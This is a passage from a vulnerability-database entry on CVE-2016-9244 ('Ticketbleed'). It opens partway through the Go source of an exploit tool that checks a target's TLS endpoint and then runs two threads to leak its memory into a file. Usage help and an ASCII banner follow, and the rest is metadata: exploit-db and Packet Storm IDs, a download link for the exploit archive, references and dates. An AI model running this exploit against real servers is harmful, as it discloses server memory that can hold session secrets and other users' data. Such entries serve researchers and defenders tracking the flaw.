-h, --help Print this message

*/
package main

import "github.com/EgeBalci/Ticketbleed"
import "strconv"
import "strings"
import "fmt"
import "os"

var OutputFile string = ""
var BleedSize int = 0

func main() {

ARGS := os.Args[1:]
if len(ARGS) < 1 || len(ARGS) > 5{
fmt.Println(Help)
os.Exit(1)
}

for i := 0; i < len(ARGS); i++{

if ARGS[i] == "-h" || ARGS[i] == "--help"{
fmt.Println(Help)
os.Exit(1)
}

if ARGS[i] == "-o" || ARGS[i] == "--out"{
OutputFile = ARGS[i+1]
}

if ARGS[i] == "-s" || ARGS[i] == "--size"{
Size,err := strconv.Atoi(ARGS[i+1])
if err != nil {
fmt.Println("[-] ERROR: Invalid size value !")
os.Exit(1)
}
if Size < 0 {
fmt.Println("[-] ERROR: Size can't be smaller than 0")
os.Exit(1)
}else{
BleedSize = Size
}
}
}

if OutputFile != "" {
File, FileErr := os.Create(OutputFile)
if FileErr != nil {
fmt.Println("[-] ERROR: While creating output file !")
os.Exit(1)
}
File.Close()
fmt.Println("[*] Output file: "+OutputFile)
}

VulnStatus := Ticketbleed.Check(ARGS[0]) // First check if it's vulnerable
fmt.Println(VulnStatus)
if strings.Contains(VulnStatus, "[+]") {

go Ticketbleed.Exploit(ARGS[0], OutputFile, (BleedSize/2)) // With using multiple threads it is easyer to move on stack
Ticketbleed.Exploit(ARGS[0], OutputFile, (BleedSize/2)) // Othervise server echoes back alot of duplicate value
}

}

var Help string = `
▄▄▄█████▓ ██▓ ▄████▄ ██ ▄█▀▓█████▄▄▄█████▓ ▄▄▄▄ ██▓ ▓█████ ▓█████ ▓█████▄
▓ ██▒ ▓▒▓██▒▒██▀ ▀█ ██▄█▒ ▓█ ▀▓ ██▒ ▓▒▓█████▄ ▓██▒ ▓█ ▀ ▓█ ▀ ▒██▀ ██▌
▒ ▓██░ ▒░▒██▒▒▓█ ▄ ▓███▄░ ▒███ ▒ ▓██░ ▒░▒██▒ ▄██▒██░ ▒███ ▒███ ░██ █▌
░ ▓██▓ ░ ░██░▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄░ ▓██▓ ░ ▒██░█▀ ▒██░ ▒▓█ ▄ ▒▓█ ▄ ░▓█▄ ▌
▒██▒ ░ ░██░▒ ▓███▀ ░▒██▒ █▄░▒████▒ ▒██▒ ░ ░▓█ ▀█▓░██████▒░▒████▒░▒████▒░▒████▓
▒ ░░ ░▓ ░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒ ░░ ░▒▓███▀▒░ ▒░▓ ░░░ ▒░ ░░░ ▒░ ░ ▒▒▓ ▒
â–‘ â–’ â–‘ â–‘ â–’ â–‘ â–‘â–’ â–’â–‘ â–‘ â–‘ â–‘ â–‘ â–’â–‘â–’ â–‘ â–‘ â–‘ â–’ â–‘ â–‘ â–‘ â–‘ â–‘ â–‘ â–‘ â–‘ â–’ â–’
â–‘ â–’ â–‘â–‘ â–‘ â–‘â–‘ â–‘ â–‘ â–‘ â–‘ â–‘ â–‘ â–‘ â–‘ â–‘ â–‘ â–‘ â–‘
â–‘ â–‘ â–‘ â–‘ â–‘ â–‘ â–‘ â–‘ â–‘ â–‘ â–‘ â–‘ â–‘ â–‘ â–‘
â–‘ â–‘ â–‘

Author: Ege Balci
Github: github.com/EgeBalci

USAGE:
./ticketbleed <ip:port> <options>
OPTIONS:
-o, --out Output filename for raw memory
-s, --size Size in bytes to read
-h, --help Print this message
`

https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41298.zip

Trust: 1.0

sources: EXPLOIT-DB: 41298

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 41298

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 41298

TYPE

'Ticketbleed' Memory Disclosure

Trust: 1.0

sources: EXPLOIT-DB: 41298

TAGS

tag:exploit

Trust: 0.5

tag:remote

Trust: 0.5

sources: PACKETSTORM: 141017

CREDITS

Ege Balci

Trust: 0.6

sources: EXPLOIT-DB: 41298

EXTERNAL IDS

db:NVDid:CVE-2016-9244

Trust: 2.4

db:EXPLOIT-DBid:41298

Trust: 1.6

db:EDBNETid:90818

Trust: 0.6

db:0DAYTODAYid:30168

Trust: 0.6

db:EDBNETid:97483

Trust: 0.6

db:PACKETSTORMid:141017

Trust: 0.5

db:BIDid:96143

Trust: 0.3

sources: BID: 96143 // PACKETSTORM: 141017 // EXPLOIT-DB: 41298 // EDBNET: 90818 // EDBNET: 97483

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2016-9244

Trust: 1.5

url:https://www.exploit-db.com/exploits/41298/

Trust: 0.6

url:https://0day.today/exploits/30168

Trust: 0.6

url:https://support.f5.com/csp/article/k05121675

Trust: 0.3

url:https://blog.filippo.io/finding-ticketbleed/

Trust: 0.3

url:http://www.f5.com/products/big-ip/

Trust: 0.3

url:https://filippo.io/ticketbleed/

Trust: 0.3

sources: BID: 96143 // PACKETSTORM: 141017 // EXPLOIT-DB: 41298 // EDBNET: 90818 // EDBNET: 97483

SOURCES

db:BIDid:96143
db:PACKETSTORMid:141017
db:EXPLOIT-DBid:41298
db:EDBNETid:90818
db:EDBNETid:97483

LAST UPDATE DATE

2022-07-27T09:37:37.467000+00:00


SOURCES UPDATE DATE

db:BIDid:96143date:2017-03-07T03:02:00

SOURCES RELEASE DATE

db:BIDid:96143date:2017-02-09T00:00:00
db:PACKETSTORMid:141017date:2017-02-10T22:22:22
db:EXPLOIT-DBid:41298date:2017-02-10T00:00:00
db:EDBNETid:90818date:2017-02-11T00:00:00
db:EDBNETid:97483date:2018-04-12T00:00:00